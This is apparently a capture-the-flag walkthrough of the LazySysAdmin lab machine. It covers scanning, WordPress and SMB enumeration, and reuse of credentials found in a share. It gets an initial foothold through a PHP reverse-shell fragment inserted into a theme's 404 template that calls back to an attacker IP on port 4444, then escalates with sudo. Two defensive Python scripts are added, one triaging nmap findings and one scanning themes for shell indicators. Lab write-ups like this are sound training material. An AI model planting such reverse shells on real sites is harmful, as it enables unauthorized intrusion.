Information gathering
root@kali:~# nmap -A 192.168.243.159
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-27 20:40 EST
Nmap scan report for bogon (192.168.243.159)
Host is up (0.00063s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
| 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
| 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
| irc-info:
| server: Admin.local
| users: 1
| servers: 1
| chans: 0
| lusers: 1
| lservers: 0
| source ident: nmap
| source host: 192.168.243.133
|_ error: Closing link: ([email protected]) [Client exited]
MAC Address: 00:0C:29:5A:23:74 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -3h20m00s, deviation: 5h46m24s, median: 0s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: lazysysadmin
| NetBIOS computer name: LAZYSYSADMIN\x00
| Domain name: \x00
| FQDN: lazysysadmin
|_ System time: 2020-12-28T11:41:10+10:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-12-27 20:41:10
|_ start_date: N/A

TRACEROUTE
HOP RTT ADDRESS
1 0.63 ms bogon (192.168.243.159)
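The scan above already contains the findings a defender would act on first: SMB accepts a guest session, SMB1 message signing is disabled and SMB2 signing is not required, MySQL and IRC are reachable from the scanning host, and robots.txt advertises four "hidden" paths. The following is an added example (not part of the original walkthrough) that turns an nmap -A text report into a list of such findings; the sample report is an excerpt of the scan printed above, and the port-to-service table and severity labels are my own assumptions.

```python
import re

# Excerpt of the nmap -A output from the walkthrough above. Only the lines
# the triage rules inspect are needed; the full report parses the same way.
SAMPLE_SCAN = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
"""

# One nmap port line: "<port>/<proto> <state> <service> <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")

# Services that normally should not be reachable from arbitrary hosts
# (assumed policy for this example).
EXPOSED_SERVICES = {139: "NetBIOS session", 445: "SMB", 3306: "MySQL", 6667: "IRC"}


def parse_ports(report: str) -> list[dict]:
    """Return one dict per port line: port, proto, state, service, version."""
    ports = []
    for line in report.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            ports.append({
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),
            })
    return ports


def robots_disallowed(report: str) -> list[str]:
    """Return the paths nmap's http-robots.txt script listed as disallowed."""
    lines = report.splitlines()
    for i, line in enumerate(lines):
        if "http-robots.txt:" in line and i + 1 < len(lines):
            # The next line looks like "|_/old/ /test/ ..."; drop the script prefix.
            return lines[i + 1].lstrip("|_ ").split()
    return []


def triage(report: str) -> list[tuple[str, str]]:
    """Turn an nmap -A text report into (severity, finding) pairs."""
    findings = []
    for p in parse_ports(report):
        if p["state"] == "open" and p["port"] in EXPOSED_SERVICES:
            name = EXPOSED_SERVICES[p["port"]]
            findings.append(("medium", f"{name} ({p['port']}/{p['proto']}) reachable from the scanning host"))
    if re.search(r"message_signing:\s*disabled", report):
        findings.append(("high", "SMB1 message signing disabled"))
    if "Message signing enabled but not required" in report:
        findings.append(("high", "SMB2 message signing not required"))
    if re.search(r"account_used:\s*guest", report):
        findings.append(("high", "SMB accepted a guest (unauthenticated) session"))
    for path in robots_disallowed(report):
        findings.append(("low", f"robots.txt hides {path}; confirm it is access-controlled, not merely unlisted"))
    return findings


if __name__ == "__main__":
    for severity, text in triage(SAMPLE_SCAN):
        print(f"[{severity}] {text}")
```

Run on a saved `nmap -A -oN report.txt` file by passing its contents to `triage()`; the rules are deliberately simple string and regex checks so they can be extended per environment.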
Visiting the page on port 80: Backnode
view-source:http://192.168.243.159/#%21page-use-backnode
Directory enumeration
root@kali:~# dirb http://192.168.243.159/
wordpress
http://192.168.243.159/wordpress/
WPscan
root@kali:~# wpscan -u http://192.168.243.159/wordpress/ -eu --force
Components
enum4linux
root@kali:~# enum4linux 192.168.243.159
A share was found: OK
Nikto scan
root@kali:~# nikto -h 192.168.243.159
phpmyadmin
http://192.168.243.159/phpmyadmin/
Browsing the shared directory
The WordPress database password is found in wp-config.php:
define('DB_USER', 'Admin');
define('DB_PASSWORD', 'TogieMYSQL12345^^');
Login successful
File upload / modification
Reverse shell
In the admin panel, under Appearance -> Editor, edit the 404 page template
and add the following:
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.10.128';
$port = '4444';
$CHUNK_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a;w;id;/bin/sh -i';
$daemon = 0;
$debug = 0;
Set up the listener on Kali and obtain the initial shell.
http://192.168.243.159/wordpress/wp-content/themes/twentyfifteen/404.php
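Two things made this step work: the database credentials were readable from an unauthenticated share, and the WordPress dashboard allowed editing theme files in place. WordPress disables the in-dashboard theme and plugin editor when wp-config.php defines the `DISALLOW_FILE_EDIT` constant as true. The following is an added example, not part of the original walkthrough, that checks a wp-config.php for that setting and scans a theme directory for templates containing shell indicators such as the `/bin/sh -i` string from the snippet above. The sample tree it builds in a temporary directory is constructed for the example; the indicator list is my own choice.

```python
import re
import tempfile
from pathlib import Path

# Patterns a theme template has no legitimate reason to contain: socket and
# process primitives, an interactive shell, or a common obfuscation wrapper.
SHELL_INDICATORS = [
    r"fsockopen\s*\(",
    r"proc_open\s*\(",
    r"shell_exec\s*\(",
    r"passthru\s*\(",
    r"/bin/sh\s+-i",
    r"base64_decode\s*\(",
]
INDICATOR_RE = re.compile("|".join(SHELL_INDICATORS), re.IGNORECASE)

# define('DISALLOW_FILE_EDIT', true); with any spacing or quoting style
FILE_EDIT_RE = re.compile(
    r"define\s*\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.IGNORECASE
)


def file_edit_disabled(wp_config_text: str) -> bool:
    """True if wp-config.php turns off the dashboard theme/plugin editor."""
    return FILE_EDIT_RE.search(wp_config_text) is not None


def scan_theme(theme_dir: Path) -> dict[str, list[str]]:
    """Map each PHP file under theme_dir to the indicators found in it.

    Files with no hits are omitted, so an empty dict means a clean theme."""
    hits = {}
    for php in sorted(theme_dir.rglob("*.php")):
        text = php.read_text(errors="replace")
        matched = sorted({m.group(0) for m in INDICATOR_RE.finditer(text)})
        if matched:
            hits[str(php.relative_to(theme_dir))] = matched
    return hits


# Constructed fixtures: a clean template, a 404.php carrying the opening lines
# of the snippet shown above, and two wp-config.php variants.
CLEAN_TEMPLATE = "<?php get_header(); ?>\n<h1>Not found</h1>\n<?php get_footer(); ?>\n"
TAMPERED_404 = CLEAN_TEMPLATE + (
    "<?php\nset_time_limit(0);\n$ip = '10.10.10.128';\n$port = '4444';\n"
    "$shell = 'uname -a;w;id;/bin/sh -i';\n"
)
HARDENED_CONFIG = "<?php\ndefine('DB_NAME', 'wordpress');\ndefine('DISALLOW_FILE_EDIT', true);\n"
DEFAULT_CONFIG = "<?php\ndefine('DB_NAME', 'wordpress');\n"


def demo() -> dict:
    """Build the sample theme tree in a temp dir and run both checks."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp) / "wp-content" / "themes" / "twentyfifteen"
        theme.mkdir(parents=True)
        (theme / "index.php").write_text(CLEAN_TEMPLATE)
        (theme / "404.php").write_text(TAMPERED_404)
        return {
            "theme_hits": scan_theme(theme),
            "hardened_disables_editor": file_edit_disabled(HARDENED_CONFIG),
            "default_disables_editor": file_edit_disabled(DEFAULT_CONFIG),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Against a real install, point `scan_theme()` at `wp-content/themes` (or at `wp-content` as a whole) and pass the contents of wp-config.php to `file_edit_disabled()`; a hit on a file that also has a recent modification time is the first thing to look at in an incident like the one described here.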
(2) phpmyadmin
Credentials: togie / 12345
SSH login
sudo privilege escalation
References
https://blog.csdn.net/kevinhanser/article/details/82026466